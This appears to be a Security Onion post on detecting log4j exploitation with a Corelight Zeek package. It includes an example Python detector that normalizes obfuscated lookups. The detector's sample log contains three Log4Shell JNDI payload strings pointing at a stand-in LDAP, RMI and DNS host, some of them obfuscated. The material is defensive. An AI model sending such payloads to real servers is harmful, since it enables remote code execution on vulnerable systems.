Corelight has developed a Zeek package to detect log4j exploitation attempts:
https://github.com/corelight/cve-2021-44228
This package contains Zeek scripts which can easily be loaded into your Security Onion deployment. We've documented this process here:
https://docs.securityonion.net/en/2.3/zeek.html#custom-script-example-log4j
After following this process, we ran so-import-pcap on the log4j pcap from https://www.malware-traffic-analysis.net/2021/12/14/index.html:
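The Corelight package flags the `${jndi:...}` lookup strings that log4j exploitation attempts carry in HTTP fields. As an added illustration of that detection idea (this is example code, not the Corelight package or Security Onion's own scripts), the following runs a similar check over constructed Zeek `http.log`-style lines, first collapsing the `${lower:x}`, `${upper:x}` and `${::-x}` lookups attackers use to hide the string. The field order is an assumed subset of the real `http.log` header.

```python
import re

# Assumed subset of Zeek http.log columns, in the order used in the sample below.
FIELDS = ["ts", "id.orig_h", "id.resp_h", "method", "host", "uri", "user_agent"]

# Constructed sample log lines (not taken from the page's pcap). Three of the four
# carry a JNDI lookup in the URI or User-Agent, two of them obfuscated.
SAMPLE_HTTP_LOG = """\
1639500000.1\t10.0.0.5\t10.0.0.9\tGET\tvictim\t/\tMozilla/5.0
1639500001.2\t203.0.113.7\t10.0.0.9\tGET\tvictim\t/\t${jndi:ldap://198.51.100.10:1389/a}
1639500002.3\t203.0.113.7\t10.0.0.9\tGET\tvictim\t/?x=${${lower:j}ndi:rmi://198.51.100.10/b}\tcurl/7.68
1639500003.4\t203.0.113.8\t10.0.0.9\tGET\tvictim\t/\t${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.10/c}
"""

# Innermost ${lower:x} / ${upper:x} / ${::-x} lookups (no nested braces inside).
LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}|\$\{::-([^{}]*)\}", re.I)
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize(value):
    """Resolve nested lookups inside-out until the string stops changing."""
    prev = None
    while prev != value:
        prev = value
        value = LOOKUP.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), value)
    return value


def find_log4shell(log_text):
    """Return (source IP, field) for every record whose URI or User-Agent
    contains a JNDI lookup after de-obfuscation."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(FIELDS, line.split("\t")))
        for field in ("uri", "user_agent"):
            if JNDI.search(normalize(rec.get(field, ""))):
                hits.append((rec["id.orig_h"], field))
                break
    return hits


if __name__ == "__main__":
    for src, field in find_log4shell(SAMPLE_HTTP_LOG):
        print(f"possible log4j exploitation attempt from {src} in {field}")
```

Running the script against the sample reports the three records from 203.0.113.7 and 203.0.113.8 and ignores the benign request.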